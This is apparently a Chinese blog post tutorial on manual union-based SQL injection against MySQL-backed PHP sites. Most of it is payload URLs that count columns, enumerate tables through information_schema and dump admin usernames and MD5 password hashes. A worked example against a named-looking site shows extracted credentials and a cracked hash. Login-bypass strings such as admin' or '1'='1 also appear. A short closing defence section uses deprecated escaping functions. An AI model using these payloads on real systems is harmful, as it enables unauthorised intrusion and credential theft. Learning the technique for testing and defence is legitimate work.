sql注入
17262016-12-23 07:20:00返回列表
通过拼接sql语句来判断和验证漏洞
通过拼接sql语句来判断和验证漏洞
测试语句:
'
and 1=1
and 1=2
order by
union联合查询
http://www.xxx.com/xx.php?id=12'
http://www.xxx.com/xx.php?id=12' and 1=2'
http://www.xxx.com/xx.php?id=12' and 1=1'
首先
http://www.xxx.com/xx.php?id=12 order by 8 这的8是需要试的,表示这个表中有多少个字段
然后
http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,3,4,5,6,7
然后页面查询出错显示出相应字段数字
http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,3,4,5,6,user()
就显示用户root@localhost
http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,3,4,5,6,database()
显示数据库名
http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=数据库名的十六进制转换
显示数据库的表名
http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_name=表名的十六进制转换
显示表中的字段
http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,3,4,5,6,group_concat(username,password) from 表名
在表名中查询用户名和密码
或者用 http://www.xxx.com/xx.php?id=12 and 1=2 union select 1,2,group_concat(username) ,4,5,6,group_concat(password) from 表名
information_schema mysql 5.0以后引用的。是对数据库中的数据库的一个索引
例子:
首先
http://www.one.com/business_view.php?id=1 and 1=2 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from information_schema.tables where table_schema=0x71646d32303934303531305f6462
显示了所有的表名 :admin,jiamengshang,news,news_category,pic,pic_category,region,renli,sys_config
http://www.one.com/business_view.php?id=1%20and%201=2%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%20from%20information_schema.tables%20where%20table_schema=0x71646d32303934303531305f6462
然后
http://www.one.com/business_view.php?id=1 and 1=2 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from information_schema.columns where table_name=0x61646d696e
显示了admin的所有字段名:
id,loginname,password,email,group_id,unmd5pwd
http://www.one.com/business_view.php?id=1 and 1=2 union select 1,2,3,group_concat(loginname,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin
显示了后台的用户名和密码:
admin
21232f297a57a5a743894a0e4a801fc3 此密码是md5加密,解密后是admin
进行判断
http://www.one.com/business_view.php?id=1 and 1=2 union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
显示数据库的当前安装的版本
http://www.one.com/business_view.php?id=1 and 1=2 union select 1,2,3,@@version_compile_os,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
显示操作系统
http://www.one.com/business_view.php?id=1 and 1=2 union select 1,2,3,@@basedir,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
显示数据库路径
//介绍几个常用函数:
1. version()——MySQL版本
2. user()——用户名
3. database()——数据库名
4. @@datadir——数据库路径
5. @@version_compile_os——操作系统版本
绕过登录密码的:
用户名:admin’ or ‘1’=‘1- - - -在sql语句中是sql语句结束
dmin’ or 1=‘1
sql防御:
1.通用脚本
2.mysql_real_escape_string() add
stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。
预防数据库攻击的正确做法:
<?php
function check_input($value)
{
// 去除斜杠
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// 如果不是数字则加引号
if (!is_numeric($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
return $value;
}
$con = mysql_connect("localhost", "hello", "321");
if (!$con)
{
die('Could not connect: ' . mysql_error());
}
// 进行安全的 SQL
$user = check_input($_POST['user']);
$pwd = check_input($_POST['pwd']);
$sql = "SELECT * FROM users WHERE
user=$user AND password=$pwd";
mysql_query($sql);
mysql_close($con);
?>